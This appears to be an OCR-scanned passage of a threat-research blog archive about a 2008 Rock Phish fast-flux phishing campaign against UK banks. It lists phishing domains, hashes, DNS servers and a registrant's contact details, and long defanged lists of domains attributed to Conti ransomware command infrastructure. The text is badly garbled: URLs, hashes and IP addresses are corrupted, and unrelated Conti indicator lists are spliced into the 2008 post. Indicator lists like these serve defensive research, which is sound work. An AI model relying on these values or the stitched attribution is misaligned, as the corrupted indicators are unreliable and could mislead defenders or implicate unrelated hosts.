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[12]BlackEnergy DDoS Bot Web Based 

[13]A New DDoS Malware Kit in the Wild 

[14]The Small Pack Web Malware Exploitation Kit 
[15]The Nuclear Grabber Kit 

[16]The Apophis Kit 

[17]Nuclear Malware Kit 

[18]The Random JS Malware Exploitation Kit 
[19]Metaphisher Malware Kit Spotted in the Wild 


. http: //ddanchev. blogspot .com/2007/07/malware-embedded-sites-increasing.htm 
ttp://blogs.zdnet.com/security/?p=221 


ttp://ddanchev.blogspot.com/2008/11/new-web-malware-exploitation-kit-in. html 


ttp://ddanchev. blogspot .com/2008/11/modified-zeus-crimeware-kit-gets.htm 


ttp://ddanchev.blogspot.com/2008/11/zeus-crimeware-kit-gets-carding-layout .htm 


| http: //adanchey blogspot. con/2008/10/eb-based-nalvare-enphasizes-on-ant.nta 
_http://adanchev blogspot .con/2008/10/copycat-veb-nalwvare~exploitation-kit heal 

_http://adanchey blogspot. con/2008/10/veb-based-nalvare-eradi cates-rootkits. nal 
_ http: //adanchev blogspot .con/2008/05/evo~copycat-veb-nalvare- exploitation. hea] 
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10. http: //ddanchev. blogspot .com/2008/09/copycat-web-malware-exploitation-kits.htm 
11. http://ddanchev. blogspot .com/2008/08/web-based-botnet-command-and-control.htm 
12. http://ddanchev. blogspot .com/2008/02/blackenergy-ddos-—bot-web-based-c.htm 


13. http://ddanchev. blogspot .com/2007/09/new-ddos-malware-kit-in-wild.htm 
14. http://ddanchev. blogspot .com/2008/05/small-pack-web-malware-exploitation-kit .htm 


15. http: //ddanchev. blogspot .com/2006/11/nuclear-grabber-toolkit. html 
16. http://ddanchev. blogspot .com/2008/02/rbns-phishing-activities.htm 
17. http://ddanchev. blogspot .com/2007/08/nuclear-malware-kit .htm 


18. http://ddanchev. blogspot .com/2008/01/random- js-malware-exploitation-kit .htm 
19. http://ddanchev. blogspot .com/2007/11/metaphisher-malware-kit-spotted-in-wild. htm 


4.12.2 Rock Phish-ing in December (2008-12-02 14:24) 
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Nothing can warm up the heart of a security researcher better than a batch of currently active 
Rock Phish domains, fast-fluxing by using U.S based malware infected hosts as infrastructure 
provider. What is this assessment of currently active Rock Phish campaign aiming to achieve? 
In short, prove that the people that were Rock Phish-ing at the beginning of the year, are 
exactly the same people that continue Rock Phish-ing at the end of the year, thereby pointing 
out that as long as they’re not where they’re supposed to be, they are not going to stop 
innovating and working on a higher average online time for their campaigns. 
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What’s particularly interesting about this campaign, is that compared to previous ones tar- 
geting multiple brands, the thousands of malware infected hosts and domains are targeting 
Alliance & Leicester and Abbey National only. 


Active Rock Phish Domains in fast-flux : 
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09e70683cc87477523210378d52f85c1213ae0f7d41d00d1041869af52c299d7 
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2j1f .net 


confirm-updates .com 
paypal.confirm-updates .com 
user-data-confirmation .com 
paypal.user-data-confirmation .com 
capitalone.updating-informations .com 


Sample sub-domain structure : 
mybank.alliance-leicester.co.uk.7azwmrsg5 .com 
mybank.alliance-leicester.co.uk.bgoryomek .com 
mybank.aliance-leicester.co.uk.stgsfw7sr .com 
mybank.alliance-leicester.co.uk.zp304ju3z .com 
mybank.alliance-leicester.co.uk.5nt29884j .com 
mybank.aliance-leicester.co.uk.bgoryomek .com 
mybank.alliance-leicester.co.uk.bgoryomek .com 
mybank.aliance-leicester.co.uk.stgsfw7sr .com 
mybank.alliance-leicester.co.uk.stgsfw7sr .com 
mybank.aliance-leicester.co.uk.zp304ju3z .com 
mybank.alliance-leicester.co.uk.zp304ju3z .com 
myonlineaccounts2.abbeynational.co.uk.pn3ekq976 .com 
myonlineaccounts1.abeynational.com.pn3ekq976 .com 
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08573539b9c02a66a5e7b82828d4bd528bd1b3345bda6d31311e01b85f329faa 
d33ee39ed2df3846e899bcfb8b0d9a4662ad 7047 2b0f13c7662c7e48fe677aca 
08518858546efd59463997b0ce54a439ac3a4571c3dd78158f8d0b84abf15318 
b19ed2c6d606ba39b178c40e6521d3c018f2771093a34a53cd03c3aab6ec6cab6 
07f44ce30a92051bbd8483e6389088b2c44fd3fcf96d2f102538a68f47def699 
ab0e4f734b634a0a19eb27291eb10cb85aa9b49c62ee5f49e679e74e4c60015f 
07ef6cd6054d134b20fbf091c9b1244355616e50413bdf81882ff2cdf5661112 
bf81ad343dce8b514941ffd47576b78e02b41c23aec991fd5a48ad00c67ad942 
O082ea6cOb1 ffc9cfd3acc696ca79cd2768e42c73bc252dcf6345085c4e69c254 
bbd0400982d90c8ad44034d4c654921d4219aa3b28b12e5f3b13ae62708b73e4 
0808984b5c4b34c4903c6ddd7d97371abd10dc7a78f17ece6060bac54535d15b 
9744b85a140693e44849652f471ba7a53c213349f85e8055ae5e4233c75d1dad 
07d945f4de9a57919d51195c4b30c0f2a57f6475cfela95ec26c33f1c7407d8f 
892a84154516ef80df5f1764f1629c5254795669277f5ca324a035861d774cb7 
07d574c069cd35fd0dad7d6158f090e99b952b926e7 7ae6ac7162a9019bfa2f8 
a57207ec582b45d43728d1cee51da3cf96449d4697b08a090d36a62e9bbd9278 
07ef0e96d62856d2568ba49a002323b97cc7dab9a0d52714642ef4e9c3b623e1 
9dfd5658350ca646185e477c10589d2515d52880be3d272d567866565e8efebf 
07dd4895adf275edad2ba61d9fdd0c2ec9c668530807a27879d1030ca2507ela 
781fae41686240b6fa7a4756a2026b9e6939ade3727016aa304ffb0d963fa270 
07c63bf8afc129e47e754074f1453695b905586d27d739732fal84a952604a40 
6a34f4b7e39cd52f89e7c9a5bca01f5b70feb76db4fce0de7b32a0270d224827 
07b836fc23d6698157f6de3b6bd35c9d177908bf667 7adfdd60e03b8a2681186 
808be257bd078220edb14725a84169e6c5ef9916d933a5d838b687391adbcb6c 
07d31580105c365b570b3340d4219d45a6513a037b9cd5af1l63bf2ead42a2f43 
709f494ed4397ccedb3d5c8a10235669a31ae7eb79423b6fa785d141cb6d183d 
07d1236b83f2909b3f6d1F7286d21bc13b4f98670263d8dd4féd5cOffeb5a456 
Oecbb9e30efe853fc65610e5ed9b694517ed8fb17eadedc9b2f72ee234be9ec3 
Oebfacd380b8005e643efd81c28a07e977799e62717cf33ca82c90ea2f60a50a 
0ed6183adc0078a64c1a97b0e2d2721ee2b5f95cclbcb0c5e14df8ae92258f13 
0ed39ca6c69076b67 765e19594d72c519c2ee1a931616b541ad06279891f874d 
0e724d5ff23cc68978321aa891ba3d0b5aa88e3d490429592f92461b194821Ff0 
fd8f5bd06d288207635503abf28da66ec823359d18c6f887 750831035d51e9d6 
0e6ca38972a406967222773cc2541d4b0f9c6e504af5ca5b71cf84ba2bf22420 
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Oebaccbc4dbf10315e9e62f921b29a5bd2682b94606317a3c353c174alffcd37 
Oeaffc0584d5fe741e2d5561fd9cd2430dbab9c80c4be5e20602 73ac328ff104 
f9fa281fc216f852552a512b3a97408f5ae5f1ec2425871b0870cdc57f4fd7a8 
Odff6fdc87aa955bc85bc96df13df2de80e04f87328086ecad6674d77d53d24d 
cd2e40fc23a48185982764cfbafea953aae3280d209546f61fb0e711e11ca31b 
Odff0b4c12679e384c1820af51023c1f91a1898b1cfb661f41ab182dab55cef2 
fc5d9fc75944a0ae6fc90f3 6b82c5f5dd4ddee14916574879f233e442a4d8452 
0e373e0e2bbb759d495ef5c8cale146e06874026f69ab7050e030788f0054c40 
fc3c17833725d727590ef00fdf3f8d70f52d4c13a9cf52a77b6e74e22d7dae61 
OeOb3def0db831073aaf3c8c836af27b652175b9c7a871eab644398593f58e89 
bf2ba8fcb2ef1776e7a29bbb50610dd76ef90e122df47b2d3dd0f5d1c29137c5 
Odb9b46f4cdf18407515c08b69d84cfe4d5c267b2404e9a564c32cceO0cbde96b 
b338a6789c8fd780cb5506b9bb19af8b6275594d0d1ceefb6e59d5002def68b0 
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99dcle6c7b821f9931a796496e2daf6fd4b6d71112fbe4db628346500754ff33 
79e52cdf49611e7aa39f2bb9b6a651f0a5 8abf2bd0e645f64b49720281033ee1 
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ffbe2a17ced982155f3440c04cf483belccbc35c4685c9a9af1l4c6e8af5a2dc1 
fd2a9d45925c5a260abd92fcfa5e2abd72bcc069170df95dd18a2a4f8b57405e 
401420dc0d3afd1a93dd3f201415fd3a6692103aed3f19487b171c5fbcdcac45 
17c04932b68cbacea61759b43dc393b1c7dc32dd13276473c3f32411e0f380ef 
cb40ed82c3bd3c1d7f15801260e85cb1a23b9f36650def0025fa52061236b8fc 
3bc04f42889cbb28063add7775f6d115858bb38584295fdde8b5eb9b2062delf 
5ec7a2cff47d7a03745adcle72cdcf18b50c28b4c666e463a848824622bf0032 
3cf322e0c3281a8079118d39e88585265ae78bb4d5 7 3baf8d85ee59ff8el7c3a 
fc8dal6fbef891b65f2ade26b29f93927b11df260251e8d813356cee39e255dd 
dd4c3b37580c0a058553ca5ebbce72064d21abd16214a79a45d994e73c702f97 
d89b709a7048d214c4dfba4b9c3acc5a372c2f6cbObdb72feb4f1f82ef114586 
f9eb237da38ea40f09722d8035163974c6408138a5 7 9f2df9793f02d0057a7a3 
df0d7b10b68d0ea022aa73a722ac3391553f72cea4d583be8e000195ff116f07 
c00042ab524ed7061ffec804ccb8495fdcOfcfff0f3827c24f5ec3e876aec587 
bef12fd8611aa21c16dd7baca411255al102cc9207ec9adb0697f84fcf3a8c825 
cb2cf950c5dfd17025b972bdd5462a2be950630e5040c4da5b9566d39a5aaa47 
€874763582afeal009bd1785ee800f02 74fa0370c3cb005eed0fed535b20040a 
83f0eae0b68e3575f339d2f1c884649a465770b1f02935b9938eca52fff992d3 
7176922015df7853138bc2b1e811e43d291fe0e1942fcf43b3502e4576804f2e 
bed485f808546e641fe8c891c7cfd11d04170c5af89933fal68dd6afld5b6b44 
8597ea1891973dff6cfc7b2001dc35a900fc389d6eef7 b64f02a7292d06676ed 
5528ec59a5342bae1849c6b3938e19aa93cce22918b43bc16133232495c14ffd 
401d71c3ce5702b2b111b0b493898ff5196bb1db0715efc9785ele3d03dcba0d 
5dbf6a2c8d5defb7c3246d2568e8e84d59a54fe4182c11ff623325 7a3cdf2880 
55465296b370c17961a82574ab8d98752657cbb3af20c0ad47802d12de50b519 
3464c104d60b1a93f3e02a3a4060302972505bad449b529f79daa541b3f1765e 
30eaa23e993dd7742fc4f7443951e036b23dalcff44963675fcfd0Ob60bd091d2 
3a3faeb9b0147ddfeblec9f9363e18e0696adb1d5767b0966b4065de4f19f315 
3a3032f28b080be56626c4ff6c345fe83457e4148644026b4899e6aead5bd570 
231ea6b17aa52f9d41497366d88dfb7 7ea0e60112cf3017a62961dd95c8c4335 
21a4a3774be7202362aa8be4cf695f793b20367ab682c8617c18612a97bc31dc 
2dce5223c68060975d694cd2963325a0f49c7f2c46fe9ab89e8b4e4110f65703 
253a5e9e480853932ab55e3753c4a28ecee9d38487dda4d59314c61c2f6f98078 
051e659236887414af9298c49d8c56c4a7e015599d2671768fc92904a78aaf8e 
04c4a162cfa4b14b9094c480b59eb4d46280ab61bca8c7f7ee726f417d98ae65 
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211a453bf6f02f9c70dc23d304f77 7bad0ffa832a31f7108e9b8463f0c6b5ec3 
133bce8d5ea51f8890f6b37dcf728b7b50a7a6815461d475bf31e4d0c10cb419 


Related responding domains known to have participated in Conti ransomware gang’s C &C 
(Command and Control) and Internet connected infrastructure include: 


11985-22223[.]bacloud[.]info 
14740-25788[.]bacloud[.]info 
15161-26416[.]bacloud[.]info 
15877-27627[.]bacloud[.]info 
162[.]244[.]81[.]252[.]81[.]244[.]162[.Jin-addr[ .Jarpa 
173-19-92-26[.]client[.]mchsi[.Jcom 
185[.]189[.]151[.]142 
198-46-198-128-host[.]colocrossing[.]com 
198-46-198-9-host[.]colocrossing[.]com 
285[.]bhs[.Jabcvg[.Jovh 
43[.]126[.]75[.]91[.]stargatecommunications[.]com 
45[.]32[.]131[.]223[.]vultr[.Jcom 
45[.]32[.]132[.]182[.]vultr[.Jcom 
65-119-186-242[.]dia[.]static[.]qwest[.]net 
75-163-169-121[.]clsp[.]qwest[.]net 
79-112-76-251[.]iasi[.]fiberlink[.]ro 
912[.]rbx[.Jabcvg[.Jovh 
96-93-217-253-static[.]hfc[.]comcastbusiness[.]net 
9879-17568[.]bacloud[.]info 
andgetroid[.]co[.Juk 
api[.]snapcraft[.]io 
bitavey[.]Jcom 
bras-base-ahbgon0101w-grc-24-184-146-91-74[.]dsl[.]bell[.Jca 
c-68-61-238-2[.]hsd1[.]mil[.Jcomcast[.]net 
c-73-128-248-22[.]hsd1[.]md[.]comcast[.]net 
c-73-31-89-221[.]hsd1[.]Jwv[.]Jcomcast[.]net 
contestep[.]com 
cpe-174-96-143-3[.]columbus[.]res[. ]rr[.Jcom 
cpe-67-243-142-225[.]nyc[.]res[.Jrr[.Jcom 
dns-reverse[.]net 
ec2-3-11-85-34[.]eu-west-2[.]compute[.]amazonaws[.]com 
einstein[.]census[.]shodan[.]io 
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enigma-hq[.]net 
free[.]ds[.]melbicom[.]net 
g6wz1wll[.]lifeinsuranceux[.]Jcom 
gw1[.]Jmad1[.]vitalng[.]Jcom 
hathil[.Jco[.]in 
hml04[.]pabsticalch[.]info 
home[.]boomshow][. ]live 
hwsrv-935246[. ]hostwindsdns[.]com 
hwsrv-935575[.]hostwindsdns[.]com 
ip29[.]ip-51-38-95[.Jeu 
ip4[.]ip-198-244-194[.]eu 
jh153[.]perfectdeals[.]xyz 
mail[.Jarmalavage[.]com 
mail[.Jextrasenses[.]ru 
mail[.]keystonecollections[.]Jcom 
mail[.]stonesriverelectric[.]com 
mail[.]zeakids[.]de 
male-disk[.]picotor[.]net 
nc-ph-3259[.]web-hosting[.]Jcom 
no-mans-land[.]m247[.]Jcom 
no-rdns[.]mivocloud[.]com 
ns3206394[.]ip-37-187-24[.]leu 
nxmrwayhk[.Jcom 
ool-18b93d63[.]dyn[.]Joptonline[.]net 
p57a63989[. JdipO[. ]t-ipconnect[.]de 
p57a6398e[. ]dipO[.]t-ipconnect[.]de 
pool-71-168-131-157[.]Jcmdnnj[. ]fios[.]verizon[.]net 
remote[.]baldeaglesecurity[.]Jcom 
rix[.]2vpn[.]net 
rns[.]nz[.]zappiehost[.]com 
rotfl[.]Jco[.Juk 
rrcs-192-154-176-134[.]sw[.]biz[.Jrr[.Jcom 
rrcs-97-77-191-226[.]sw[.]biz[.]rr[.Jcom 
5445689[.]srvape[.]Jcom 
sau-6bc8f-or[.]servercontrol[.Jcom[.]Jau 
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2eoxn8sb6.com 


ee 186.120.0185 — AT ASTINI7 
Ni 


24.60.0.015 — ge AS 7015 


186.12.54.99 


24,60.223.88 ——_— ge 6 24-10:223-88. Nsd1 ma comeastnet 
4.128009 —————_________“S_g 493356 
4.253.1813 ———C_gp diaiup-4.253.18.13.dialt dalias1 Jevel3. net 


64.216.0.0014 


a el AS 
64.218.107139 —__2_» S ceagniieentaien nea, 


70.224.0.011 
70,235.22.153 —— Ege ais i-70-235-22-153.ds1,Itrkar.sbeglobal.net 


79,205.0,089 6 ASIST 


79,205.952,.83 Oe 6-71-205-152-83 NST Mi COMCast Net 
ot 85,224.0.013 ———____-45_-g AS2119 
85.227.172.99 Pir 


TP 663000355 1212-12-64736¢1 3.cust bredbandsbolaget se 
97.81.205.120 ———MEL 97. 81.192.09 ——__“_-m as20115 
™ 


97-81-205-120.dhep Nckr.nc.charter.com 


98.298.207.78 —— Ee 98.218.0.0 6 — ge 533657 
R 
98.246.56.198 ¢-98-218-207-78.hsd1 va.comcast net 
wer - 
¢om ome 98,246.00 6 —— AS33490 


¢-98-246-56-198 hsdl or comcast net 
ns4.myboomdns.com 


NI 


ns6.myboomdns.com 


DNS servers for the campaigns : 


nsl.thecherrydns .com 
ns2.thecherrydns .com 
ns3.thecherrydns .com 
ns4.thecherrydns .com 
ns5.thecherrydns .com 
ns6.thecherrydns .com 


ns10.realgoodnameserver .com 
nsl1.realgoodnameserver .com 
rens2.realgoodnameserver .com 
rns3.realgoodnameserver .com 
ns4.realgoodnameserver .com 
ns8.realgoodnameserver .com 
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scraggy4[.]co[.]uk 

seco[.]nd 
server10180[.]megahoster[.]net 
smtp1120[.]crewaqual[.]net 
smtp[.]cpven[.]Jcom 
static[.]162[.]32[.]55[.]162[.]clients[.]your-server [.]de 
storage-669286[.]hosted-by[.]Jitldc[.]Jcom 
stylesgrab[.]com 
uk-in-f113[.]1le100[.]net 
vds-695906[.]hosted-by-itldc[.]com 
vds-853358[.]hosted-by-itldc[.]com 
vds-890093[.]hosted-by-itldc[.]com 
vps[.]hostry[.]Jcom 


Related responding domains known to have participated in Conti ransomware gang’s C &C 


(Command and Control) and Internet connected infrastructure include: 
2vpn{[.]net 
adddoe[.]fun 

ajustes[. ]digital 
alaskagova[.]com 
amazon-oc[.]Jcam 
andpick[.]cyou 
ansale[.]fun 
asoexample[.]site 
ate-co-us[.]store 
babidh[.]xyz 
bitrixtemplates[.]com 
browsergxopera[.]com 
cardd[.]top 
carriermonitoring120[.]Jcom 
chanta[.]Jcam 
configwells-2yn[.]Jcom 
contestep[.]com 
copy-max[.]com 
d24[.Jru 
datacloudhub[.]net 
dataprivacyeu[.]Jcom 
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diavol-news[.]net 
dns-reverse[.]net 
doedoe[.]best 
domosedoff[.]ru 
drywish[.]site 
e-ga-us[.]me 
e-medservices[.]net 
edzyw[.]com 
emailinboxpro[.]live 
enigma-hg[.]net 
ethnorepublic[.Jcom 
fifthreversemortgages[.]com 
gapingbutt[.]com 
gfgxfh[.]Jicu 
globall-security[.]com 
gxopera[.]Jcom 
inois-gov[.]live 
iunosti[.]Jcom 
jierdh[.]xyz 
kladtv[.]Jcom 
lovexy[.]tk 

lumus[.]ru 
micrOsoft-online[.]com 
mirOsoft-Online[.]com 
my-ppl[.]com 
navercorpc[.]website 
newsletter[.]surf 
nticket[.]md 
operagxbrowser[.]Jcom 
optionsclearing[.]house 
ozibado[.]Jcom 
plenymart[.]tk 
prossl[.]ru 
psdgiigjsjavy3[.]xyz 
rlalonarwa[. ]xyz 
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sport32[.]site 
tikkie-pay[.]com 

tmwar[.]net 

txvia[.]Jcom 
urbanconnectionsrealty[.]Jcom 
waroftheplants[.]com 
wb5nfc[.]net 
xvmfargoselect[.]Jcom 
y-gov[.]work 

yland-gov[.]me 


Related responding domains known to have participated in Conti ransomware gang’s C &C 
(Command and Control) and Internet connected infrastructure include: 


01[.]x[.]wen2[.]xyz 
02[.Jav[.]ty7j[.]pl 
02[.]bw[.]vsoe[.]space 
O2pm1h[.]rg[.]ro 
O3I[.]vb[.Jpc54[.]Jeu[.lorg 
04[.]dx[.]n5re4[.Jeu[.Jorg 
04k[.Jnpcpinc[.]Jcom 
051[.]gh[.]kecx[.]pl 
05[.Jee[.]wex1[.]pl 
07[.]bg9[. ]biz 
08[.]J2yn[.]eti4[.]pl 
09[.]x[.]wen2[.]xyz 
O9v[.]fk[.Jcxtme[.]win 
O09w[.]mz[.]tst65[.Jeu[.Jorg 
O[.Jopz[.Jetiu[.Jeu 
Oal[.]pel.Juf43[.]pl 
Oax[.Jes[.Jhxspf[.]pl 
Oax[.]ggom|[.]7-search[.]net 
Obal[.]gp[.]trfde1[. ]pl 
Obc[.]xh[.]sd61al[.]Jeu[.Jorg 
Obnta[.]rg[.]ro 
Oce[.]JaojO[.]cf 
Ocg[.]luxurykonnect[.]com 
Od5[.]fol[.]gsv2[.]pl 
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Of3[.Jabkh[.]pI 
Of7[.]helidroneservices[.]ca 
Of[.]Jcelebeez[.Jcom 
Of[.Jes[.]hxsp[.]pl 

Of[.]fk[. ]cxtmel[.]win 
0g9[.]ym[.]klbq[.Jeu[.]org 
Og[.]mh[.]cekrop[.]top 
Ogc[.]no[.]cvine[.]win 
Ogf8t[.]sammavayamo[.]com 
Ogt[.]sk[.]cd09[.]pl 
0i56[.Jacdh[.Jorg 
Oiz[.]sa[.]gf643[.Jeu[. Jorg 
Oli[.]pr[.Jnvsd[.]Jgdn 
Om[.]xh[.]sd61a[.Jeu[.Jorg 
Omz[.]db[.]pnrc[.]pl 
Omzh[.]thefootball[.Jorg[.Juk 
Op[.]sa[.]gf643[.Jeu[.Jorg 
Opil.]frontlinebkn[.]Jcom 
Ow9[.]ym[.]klbg[.Jeul[.Jorg 
Owv[. ]fk[.]Jextmef[.]win 
Ox[.]cloc[.]nevzorov[.]org 
Oy9[.]Jmh[.]Jcekrop[.]top 
Oyz[.]naturallyarbonne[.Jcom 
Oz[.Jgp[.]trfde1[.]p! 
0zqq44[.]findhere[.Jorg 
10t[.]vs[.]rtt9[.Jeu 
114[.Jact2day[.]ru 
12[.]2t1[.]lift7[.Jeu 
13[.Jishops40[.]ru 
14a[.]ny[.]nsd5[. ]pl 
14czwl[.]rg[.]ro 
158[.]kj[.]vrnbkf[.]gdn 
15[.]wt[.]Jdetmel[.]win 
17[.]x[.]wen2[.]xyz 
18[.]x[.]wen2[.]xyz 
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18d[.]kv[.]nss2[.]pl 
18khv[.]softzonesar[.]com 
1[.Jooz[.]lift6[.]Jeu 
1[.Jopz[.Jetiu[.Jeu 
1[.]p[.Jarmal2[.]eu 
la[.]Jny[.]nsd5[.]pl 
Laf[.]lifetimecounselingandconsulting[.]org 
1bt[.]lift7[.Jeu 
1bu[.]no[.]fi9d[.Jeul[. Jorg 
1cj[.]Jdy[.]tvcsd[.]pl 
1co[.]bx[.]tcd3[.]p! 
1d2[.]wt[.]Jdetmel[.]win 
1d9[.]ch[.]fd430[.]eu[.Jorg 
1f7[.]corsairoftheheart[.]com 
1gl[.]cloc[.]nevzorov[.]Jorg 
1h8[.]dx[.]n5re4[.Jeu[.Jorg 
Lh[.]cez[.]qaz3[.]pl 
LhI[.Jallagetales[.]com 
listod[.]questek[. ]tv 
1j6x8al[.]rg[.]ro 
1jk[.]samaipatatravel[.]Jcom 
1lb[.]sa[.]gf643[.]Jeu[.Jorg 
1lw[.]sa[.]gf643[.Jeu[.Jorg 
1m9[.]Jno[.]fi9d[.]Jeu[.Jorg 
103[.]fo[.]gsv2[.]pl 
lox[.]vb[.]Jpc54[.Jeu[.Jorg 
lge[.]zv[.]tsa9[.]pl 
1qm[.]ac[.]Juglltd[.]pl 
1r[.]Jm[.]pwe8g[.]pl 
1r[.]sa[.]gf643[.Jeu[.Jorg 
1rz[.]saifalicartrading[.]Jcom 
1tO[.]hj[.]tsa9[. ]pl 
1t1[.JaojO[.Jcf 
1t9[.]vb[.]pc54[.]eu[.Jorg 
lvo[.]cp[.]jkir[.]pl 
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1lwv[.]bolded[.]net 
lwyf6[.]seasonalityinvestments[.]com 
1x2[.]pjvt[.]cf 

1x[.Jkj[. ]vrnbkf[.]Jgdn 
1zg[.]midmodmich[.]com 
1zq[.]aojO[.]cf 
20140712-s034[.]vdfuh[.]in 
20140713-006[.]vdfuh[.]in 
20140714-001[.]vdfuh[.]in 
20140715b-021[.]vdfuh[.]in 
20140716-10k-011[.]vdfuhl. Jin 
20140717-a0-001[.]vdfuh[. Jin 
20140720-10[.]vdbfgr[.]pw 
20140720-62[.]vdbfgr[.]pw 
20140721-39[.]vdbfgr[.]pw 
20[.]x[.]wen2[.]xyz 
21d[.]dd[.]kfhfh4[.]Jeul[.lorg 
21m[.]sal[.]gf643[.Jeu[.Jorg 
21x[.]mjtack[.]com 
212z[.Jes[.]hxsp[.]pl 
22[.]kv[.]f443[.]Jeul[.lorg 
22[.]x[.]wen2[.]xyz 
22s[.]pel[.]uf43[.]pl 
22x[.Jes[.]hxsp[.]p! 
23w[.]Jenoshclothing[.]Jcom 
25[.Jes[.]hxsp[.]pl 
25[.]wt[.]Jdetme[.]win 
25qyxd[.]rg[.]ro 
28[.]gw[.]btse[.]review 
28[.]x[.]wen2[.]xyz 
299[.]vb[.]pc54[.]eul[.Jorg 
29a7wv[.]byinter[.]net 
29j3a[.]mc-srv[.]Jcom 
29x[.]icwejylz[.]ga 
2[.]2ny[.Jeti4[.]p! 
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2[.]2u1[.]cvuds[.]Jeu 
2[.]yuz[.]ty7jL. Ip! 
2av[.]no[.Jcvine[.]win 
2b[.]J2ny[.Jeti4[.]pl 
2bxtrd[.]rg[.]ro 
2ch[.]Jejdu[.]pl 
2cp[.]pel.Juf43[.]pl 
2dy[.]cloc[.]Jnevzorov[.]org 
2e2[.]kv[.]f443[.Jeu[.Jorg 
2eu[.]cloc[.]nevzorov[.]org 
2f4[.]grace-crowley[.]com 
2f[.J2ny[.Jeti4[.]pl 
2f[.]sal.]gf643[.Jeu[.Jorg 
2f[.Jwf[.]4246[. ]pl 
2g[.]Jot[.]kopr[.Jreview 
2glpwa[.]byinter[.]net 
2jh[.]dragonhutdubail.]com 
2jrl.Jfk[.]Jcxtme[.]win 
2k5[.]762i[.]cf 
210[.]vb[.]Jpc54[.]Jeu[.lorg 
2m1pg[.]rg[.]ro 
2n8kjswl[.]rg[.]ro 
2oi[.]sedde[.]Jeu 
2oronon[.]myclarevision[.]com 
2q[.]pel.]uf43[.]pl 
2ayl.]qd[.]dpo2[.]p! 
2r[.Jox[.]wog3[.]Jeu 
2rb[.]3stylefitness[.]co[.]uk 
2s3x[.]athleticintel[.]co[.Juk 
2s[.]fi[.]Jmtr5[.]pl 
2s[.]sa[.]gf643[.]eu[.Jorg 
2t1[.]lift7[.Jeu 
2t[.]vs[.]rtt9[.Jeu 
2tf[.Jes[.]hxsp[.]pl 
2ube[.]mindsandbeauty[.]com 


20339 


2up[.]punkrockradio[.]net 
2uu[.]xh[.]sd61al[.Jeu[.Jorg 
2wgql[.]hosthorde[.]net 
2x2[.]efuckgay[.]co[.]uk 
2y4[.]Jamoretravels[.]Jcom 
2zk[.]brianshuhaibar[.]com 
303[.]fk[.]Jcxtme[.]win 
30f[.]taylorpouredwalls[.Jcom 
30160c[.]rg[.]ro 
30y[.]8t[.Joimc[.]xyz 
31i[.]pmjwlo[.]gq 
326[.]fol.Jgsv2[.]pl 
345[.]ke[.]fcyt[.]Jdate 
34m[.]arborsagecounseling[.]Jcom 
35[.]x[.Jwen2[.]xyz 
35h[.]drc[.]z99[.]in[.]Jnet 
37yey[.]Jgamename[.]net 
38[.]wye[.Joeilkr[.Jgdn 
3a[.]sa[.]gf643[.]eul[.Jorg 
3b8[.]qd[.]dpo2[.]pl 
3b[.]Jdrc[.]z99[.Jin[.]net 
3be[.]yellowwild[.]Jcom 
3bo[.]no[.]fi9d[.Jeu[.Jorg 
3bz[.]qd[.]dpo2[.]p! 
3cO[.]ym[.]klbq[.Jeu[.]org 
3d[.]wf[.]4246[.]pl 
3eo0[.]dh[.]fpnc[.]Jmen 
3hh[.]nsitehere[.]website 
3j[.]178lial[.]fullmoonaudio[.]Jcom 
3j[.]fol.]gsv2[.]pl 
3jlzg5[.]rg[.]ro 
3jql.]geoexplorercolombia[.]Jcom 
3k[.]kj[.]vrnbkf[.Jgdn 
3k[.]mz[.]tst65[.Jeul[.Jorg 
313[.]vs[.]tnmul[.]pw 
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3I[.]cloc[.]Jnevzorov[.]org 
3lm[.]aerialarts[.]ca 
3m[.]xh[.]sd61a[.Jeu[.]org 
3mc[.]vb[.]pc54[.]eul[.Jorg 
3ni[.]Jcelebeez[.]Jcom 
30[.]sa[.]gf643[.]eul[.Jorg 
3q2[.]bluefusionband[.]Jcom 
3q[.]2yn[.]eti4[.]pl 
3qe[.]universidaddelexito[.]com 
3qv[.Jor[.]dfct[.]stream 
3s9za[.]rg[.]ro 
3tt[.Jaerialarts[.]ca 
3urnon[.]dyndns[.]berlin 
3uv[.]cloc[.]Jnevzorov[.]org 
3v7dg7p[.Jdynu[.]com 
3vf[.Jkj[.]vrnbkf[.]gdn 
3wj[.]mywildlife[.]info 
3x1[.]dh[.]fpnc[.]Jmen 
3xul[.]kj[.]Jvrnbkf[.Jgdn 
40[.]drc[.]z99[.Jin[.Jnet 
40u[.Jes[.]Jhxsp[.]pl 
421[.]bb[.Jcda9[. ]pl 
42p[.]dy[.]musi6[.]pl 
42v[.]dx[.]n5re4[.Jeu[.Jorg 
42x[.Jym[.]klbg[.Jeu[.Jorg 
43k[.]ke[.]fcyt[.]date 
44k[.]kv[.]f443[.]eu[.Jorg 
45-14-226-23[.]cprapid[.]com 
45s[.Joqslaxl[.]ga 
46[.]yoxaaare[.]gq 
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Domains registrant : 

Name: Pan Wei wei 

Organization : Pan Wei wei 

Address : BaoChun Rd. 27, No. 3, 1F, Apt. 1903 
City : Bejing 

Province/State : Beijing 

Country : CN 

Postal Code : 100176 

Phone Number : 010-010-58022118-58022118 
Fax : 86-010-58022118-58022118 

Email : 127@126.com 


These well known Rock Phish campaigners, have been naturally multitasking on several 
different underground fronts throughout the year. For instance, their 2j1f .net is known to 
have been [1]hosting money mule company’s site, and also, it was used in a previously 
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analyzed [2]phishing campaign that was spreading across Facebook in June. Need more 
evidence on the consolidation that’s been ongoing for over an year and half now? An infamous 
money mule recruiting company (Cash-Transfers Inc.) was also taking advantage of the 
[3]fast-flux network offered by the ASProx botnet masters in July. 


As a firm believer in that "the whole is greater than the sum of its parts", the popular 
"sitting duck" cybercrime infrastructure hosting model will be either replaced by a cybercrime 
infrastructure relying entirely on legitimate services, or one where the average malware 
infected Internet user would be temporarily used as a hosting provider. 


If millions were made by using the "sitting duck" hosting model, how many would be 
made using the others, given that they would inevitably increase the average online time for 
a malicious campaign? 


Related Rock Phish research : 
[4]209 Host Locked 

[5]209.1 Host Locked 

[6]66.1 Host Locked 

[7]Confirm Your Gullibility 
[8]Assessing a Rock Phish Campaign 


Related fast-flux research : 

[9]Fast-Flux Spam and Scams Increasing 

[10]Fast Fluxing Yet Another Pharmacy Scam 

[11]Storm Worm’s Fast Flux Networks 

[12]Managed Fast Flux Provider 

[13]Managed Fast Flux Provider - Part Two 

[14]Obfuscating Fast Fluxed SQL Injected Domains 

[15]Storm Worm Hosting Pharmaceutical Scams 

[16]Fast-Fluxing SQL injection attacks executed from the Asprox botnet 
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4.12.3. Zeus Crimeware as a Service Going Mainstream (2008-12-04 13:53) 
